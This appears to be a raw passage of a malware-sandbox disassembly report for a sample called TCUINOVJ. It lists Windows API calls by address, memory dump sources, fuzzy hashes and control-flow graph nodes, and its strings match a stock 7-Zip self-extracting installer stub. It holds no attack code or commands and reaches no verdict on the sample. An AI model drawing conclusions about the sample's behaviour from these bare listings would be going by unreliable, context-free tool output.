• ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
• ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519
  • Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569
  • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
  • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
  • Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6
• wsprintfW.USER32 ref: 00405595
• _wtol.MSVCRT ref: 004057DE
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
• ??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
• ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
• ??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
• CoInitialize.OLE32(00000000), ref: 004059E9
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
• GetKeyState.USER32(00000010), ref: 00405AA1
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
• ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004060AE
                                                                                                                                                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 0040617E
                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
                                                                                                                                                                                                                                                • _wtol.MSVCRT ref: 00405F65
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
                                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerlstrcpymemcmpwsprintf$AttributesCallbackCloseCommandCreateCurrentDirectoryDispatchDispatcherErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateUserVersionWaitWindow_wcsnicmpmemmovememsetwvsprintf
• String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
• API String ID: 154539431-3058303289
• Opcode ID: 926e16e0d72d3398af4091c0d2fb4f0e89ce66b1218389f87f1cbe10f28a7287
• Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
• Opcode Fuzzy Hash: 926e16e0d72d3398af4091c0d2fb4f0e89ce66b1218389f87f1cbe10f28a7287
• Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D

Control-flow Graph
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bc4e185761910bab2b3e9b4b194fe0f2484e14367d7febfa53cbc10b96610557
• Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
• Opcode Fuzzy Hash: bc4e185761910bab2b3e9b4b194fe0f2484e14367d7febfa53cbc10b96610557
• Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58

Control-flow Graph
APIs
• GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
• SetLastError.KERNEL32(00000010), ref: 0040303D
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: AttributesErrorFileLast
• String ID:
• API String ID: 1799206407-0
• Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
• Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
• Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
• Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E

APIs
• GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
• SendMessageW.USER32(00008001,00000000,?), ref: 004011FF
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: DiskFreeMessageSendSpace
• String ID:
• API String ID: 696007252-0
• Opcode ID: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
• Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
• Opcode Fuzzy Hash: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
• Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D

Control-flow Graph
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
• String ID: HpA
• API String ID: 801014965-2938899866
• Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
• Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
• Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
• Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58

Control-flow Graph

APIs
• GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
• CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
• SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
• DispatchMessageW.USER32(?), ref: 00401B89
• KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
• KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                                                                                                                                                                                                                • String ID: Static
                                                                                                                                                                                                                                                • API String ID: 2479445380-2272013587
                                                                                                                                                                                                                                                • Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                                                                                                                                                                                                • Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9

Control-flow Graph

control_flow_graph 781 40b163-40b183 call 40f0b6 784 40b2f6-40b2f9 781->784 785 40b189-40b190 call 40ac2d 781->785 788 40b192-40b194 785->788 789 40b199-40b1d6 call 40adc3 memcpy 785->789 788->784 792 40b1d9-40b1dd 789->792 793 40b202-40b221 792->793 794 40b1df-40b1f2 792->794 800 40b2a2 793->800 801 40b223-40b22b 793->801 795 40b297-40b2a0 ??3@YAXPAX@Z 794->795 796 40b1f8 794->796 799 40b2f4-40b2f5 795->799 796->793 797 40b1fa-40b1fc 796->797 797->793 797->795 799->784 802 40b2a4-40b2a5 800->802 803 40b2a7-40b2aa 801->803 804 40b22d-40b231 801->804 805 40b2ed-40b2f2 ??3@YAXPAX@Z 802->805 803->802 804->793 806 40b233-40b243 804->806 805->799 807 40b245 806->807 808 40b27a-40b292 memmove 806->808 809 40b254-40b258 807->809 808->792 810 40b25a 809->810 811 40b24c-40b24e 809->811 812 40b25c 810->812 811->812 813 40b250-40b251 811->813 812->808 814 40b25e-40b267 call 40ac2d 812->814 817 40b269-40b278 814->817 818 40b2ac-40b2e5 memcpy call 40dcfb 814->818 817->808 819 40b247-40b24a 817->819 820 40b2e8-40b2eb 818->820 819->809 820->805
APIs
• memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
• memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
• ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: ??3@memcpymemmove
• String ID:
• API String ID: 3549172513-3916222277
• Opcode ID: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
• Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
• Opcode Fuzzy Hash: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
• Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D

Control-flow Graph

control_flow_graph 822 403354-40337a lstrlenW call 4024fc 825 403385-403391 822->825 826 40337c-403380 call 40112b 822->826 828 403393-403397 825->828 829 403399-40339f 825->829 826->825 828->829 830 4033a2-4033a4 828->830 829->830 831 4033c8-4033d1 call 401986 830->831 834 4033d3-4033e6 GetSystemTimeAsFileTime GetFileAttributesW 831->834 835 4033b7-4033b9 831->835 838 4033e8-4033f6 call 40301a 834->838 839 4033ff-403408 call 401986 834->839 836 4033a6-4033ae 835->836 837 4033bb-4033bd 835->837 836->837 844 4033b0-4033b4 836->844 840 4033c3 837->840 841 403477-40347d 837->841 838->839 852 4033f8-4033fa 838->852 853 403419-40341b 839->853 854 40340a-403417 call 407776 839->854 840->831 848 4034a7-4034ba call 407776 ??3@YAXPAX@Z 841->848 849 40347f-40348a 841->849 844->837 845 4033b6 844->845 845->835 865 4034bc-4034c0 848->865 849->848 850 40348c-403490 849->850 850->848 856 403492-403497 850->856 860 40349c-4034a5 ??3@YAXPAX@Z 852->860 857 40346b-403475 ??3@YAXPAX@Z 853->857 858 40341d-40343c memcpy 853->858 854->852 856->848 862 403499-40349b 856->862 857->865 863 403451-403455 858->863 864 40343e 858->864 860->865 867 403440-403448 863->867 868 403457-403464 call 401986 863->868 866 403450 864->866 866->863 867->868 869 40344a-40344e 867->869 868->854 872 403466-403469 868->872 869->866 869->868 872->857 872->858
APIs
• lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
• GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
• GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
• ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
  • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
